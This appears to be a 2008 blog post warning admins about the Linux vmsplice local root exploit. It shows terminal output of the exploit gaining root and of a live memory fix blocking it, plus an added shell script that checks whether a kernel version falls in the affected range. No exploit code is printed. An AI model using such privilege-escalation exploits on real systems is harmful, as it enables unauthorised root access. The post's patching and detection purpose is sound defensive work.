Linux Kernel exploit for 2.6.17 up to 2.6.24.1
February 11th, 2008
Today I encountered some serious exploits floating around on Full-Disclosure, Bugtraq and even Slashdot.
Better monkey patch your multiuser machines fast, before the script kiddies get a grip on this...
- LKML about this issue
- Slashdot Article
- Debian Bugtrack about this exploit
- Live memory fix, which inserts a ret at the beginning of vmsplice() so the syscall returns immediately
- Full exploit POC
```
[0:07][br@gemini:programming/linux/exploits]% ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f9e000 .. 0xb7fd0000
[+] root
bash: 0STY: command not found
root@gemini:~/programming/linux/exploits# whoami
root
root@gemini:~/programming/linux/exploits#
```
Beware of the live memory fix: some people have experienced memory faults and system crashes after applying it.
```
[0:13][br@gemini:programming/linux/exploits]% ./disable_exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fa8000 .. 0xb7fda000
[+] root
Exploit gone!
[0:14][br@gemini:programming/linux/exploits]% ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f7c000 .. 0xb7fae000
[-] vmsplice
[0:14][br@gemini:programming/linux/exploits]% whoami
br
```
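Before deciding whether a box needs the live fix or a reboot into a patched kernel, the first thing an admin wants is a quick way to tell whether the running release even falls in the affected window the post names (2.6.17 up to and including 2.6.24.1). The script below is an added example, not part of the original post and not the exploit author's code; it assumes the release string starts with a dotted numeric version and that anything after the first `-` or `+` is a distro or build suffix. It deliberately says nothing about vendor backports: a "in the affected range" verdict means "go read your distribution's advisory", not "confirmed exploitable".

```shell
#!/bin/sh
# Added example: classify a kernel release string against the affected range
# given in the post, 2.6.17 .. 2.6.24.1 (fixed upstream in 2.6.24.2).
# Assumption: the release string begins with "major.minor[.patch[.sub]]";
# any distro/build suffix after '-' or '+' is ignored. Backported vendor
# fixes are not detected by a version check alone.

# Pack a dotted version into one integer that compares naturally.
version_key() {
    # Drop the distro/build suffix so "2.6.22-14-generic" becomes "2.6.22".
    v=${1%%-*}
    v=${v%%+*}
    # Up to four fields; awk treats a missing field as 0, so "2.6.17" and
    # "2.6.17.0" produce the same key.
    printf '%s\n' "$v" |
        awk -F. '{ printf "%d\n", $1*1000000 + $2*10000 + $3*100 + $4 }'
}

# Exit status 0 (true) if the release lies inside the affected range.
vmsplice_vulnerable_kernel() {
    k=$(version_key "$1")
    lo=$(version_key 2.6.17)
    hi=$(version_key 2.6.24.1)
    [ "$k" -ge "$lo" ] && [ "$k" -le "$hi" ]
}

# Human-readable verdict for the running kernel.
report_running_kernel() {
    rel=$(uname -r)
    if vmsplice_vulnerable_kernel "$rel"; then
        echo "kernel $rel: in the affected range, check your vendor advisory"
    else
        echo "kernel $rel: outside the affected range"
    fi
}
```

Source the file and call `report_running_kernel`, or feed `vmsplice_vulnerable_kernel` the release strings from your inventory to find the hosts that need attention first. The second terminal session above is what a successfully disabled syscall looks like from the other side: the exploit stops at `[-] vmsplice` because the call fails instead of returning a corrupted result.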
Update:
For a more in-depth analysis of what has been going on, why it happened, and what the fix is, there is a nice LWN article here.